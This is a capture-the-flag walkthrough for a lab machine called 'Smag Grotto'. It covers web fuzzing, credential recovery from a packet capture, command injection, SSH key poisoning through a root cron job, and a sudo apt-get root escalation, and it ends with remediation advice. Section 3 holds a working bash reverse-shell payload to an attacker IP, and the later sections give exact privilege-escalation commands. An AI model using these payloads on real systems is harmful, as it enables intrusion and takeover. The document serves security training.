Target IP: smag.thm (Requires /etc/hosts entry) Difficulty: Easy/Medium Objective: User (jake) & Root (root.txt) Flags

1. Executive Summary

“Smag Grotto” is a Linux machine that simulates a development environment. Initial reconnaissance involves analyzing a packet capture (PCAP) file found on a hidden web directory to recover legacy credentials and discover a hidden development subdomain. Initial access is gained via Command Injection on a login panel. Privilege escalation to the user jake is achieved by poisoning a public key backup file that a system cron job blindly restores to the user’s authorized_keys. Root access is obtained by exploiting Sudo privileges on the apt-get binary.

Key TTPs (MITRE ATT&CK):

  • T1040 (Network Sniffing): Analyzing PCAP files for credentials.
  • T1596 (Search Open Websites/Domains): Finding subdomains via traffic analysis.
  • T1059.004 (Command and Scripting Interpreter): Bash Command Injection for RCE.
  • T1053 (Scheduled Task/Job): Exploiting a backup restoration cron job.
  • T1548.003 (Sudo and Sudo Caching): Exploiting sudo apt-get (GTFOBins).

2. Enumeration

A. Network Scanning

The Nmap scan reveals the standard entry points.

  • 22/tcp (SSH): OpenSSH 7.2p2.
  • 80/tcp (HTTP): Apache Web Server.

B. Web Enumeration

Fuzzing the main site (smag.thm) reveals a critical directory:

ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://smag.thm/FUZZ
# Result: /mail

Inside /mail, we find a conversation about network migration and a downloadable file: dHJhY2Uy.pcap.

C. Forensics: The PCAP Analysis

This is the pivotal step. You analyzed the PCAP in Wireshark.

  1. Filter: http.request.method == "POST" (To find login attempts).
  2. Findings:
  • Host: development.smag.thm (A new subdomain!).
  • Credentials: helpdesk : cH4nG3M3_n0w.

Action: Add the new domain to your hosts file.

echo "10.10.x.x development.smag.thm" | sudo tee -a /etc/hosts

3. Initial Access: Command Injection

A. The Login

Navigate to http://development.smag.thm and log in with the helpdesk credentials found in the PCAP.

B. The Exploit

The dashboard likely executes a command based on your input. Payload:

bash -c 'exec bash -i &>/dev/tcp/10.10.YOUR.IP/6969 <&1'
  • Why this works: The application takes user input and passes it to a system shell (like ping or echo). By using valid bash syntax, we force it to spawn a reverse shell back to us.

Status: Shell as www-data.


4. Lateral Movement: The “Backup” Poisoning

A. Enumeration

You checked cat /etc/crontab and found a very interesting job running as root:

* * * * * root /bin/cat /opt/.backups/jake_id_rsa.pub.backup > /home/jake/.ssh/authorized_keys

Analysis:

  1. Every minute, the system takes the content of /opt/.backups/jake_id_rsa.pub.backup.
  2. It overwrites jake’s authorized_keys file with that content.
  3. The Flaw: ls -l /opt/.backups/ shows the file is world-writable (or writable by www-data).

B. The Exploit (SSH Key Injection)

We can replace the “backup” with our own Public Key. When the cron job runs, it will install our key into Jake’s account, giving us SSH access.

  1. Generate Key (Attacker Machine):
ssh-keygen -f mykey
  1. Poison the File (Victim Machine): Copy the content of mykey.pub:
echo "ssh-rsa AAAAB3..." > /opt/.backups/jake_id_rsa.pub.backup
  1. Wait: Wait 60 seconds for the cron job to trigger.
  2. Login:
ssh -i mykey jake@smag.thm

Status: User jake.


5. Privilege Escalation: Sudo Apt-Get

A. Enumeration

Checking sudo rights:

sudo -l
# (ALL : ALL) NOPASSWD: /usr/bin/apt-get

B. The Exploit (GTFOBins)

apt-get allows running commands via configuration options (Pre-Invoke). This executes a command before the update process starts.

Command:

sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh

Result: The system spawns a shell as root.

# whoami
root

Root Flag: /root/root.txt.


6. Remediation (Blue Team)

  1. Backup Permissions: Backup files (/opt/.backups) should never be writable by unprivileged users (www-data).
  2. Cron Hygiene: Avoid cron jobs that blindly overwrite security-critical files (authorized_keys) from untrusted sources.
  3. Sudo Configuration: Do not grant NOPASSWD sudo rights to package managers like apt-get, yum, or dpkg, as they effectively grant root shell access.
  4. Traffic Encryption: The PCAP showed login credentials in cleartext (HTTP). Use HTTPS to prevent credential sniffing.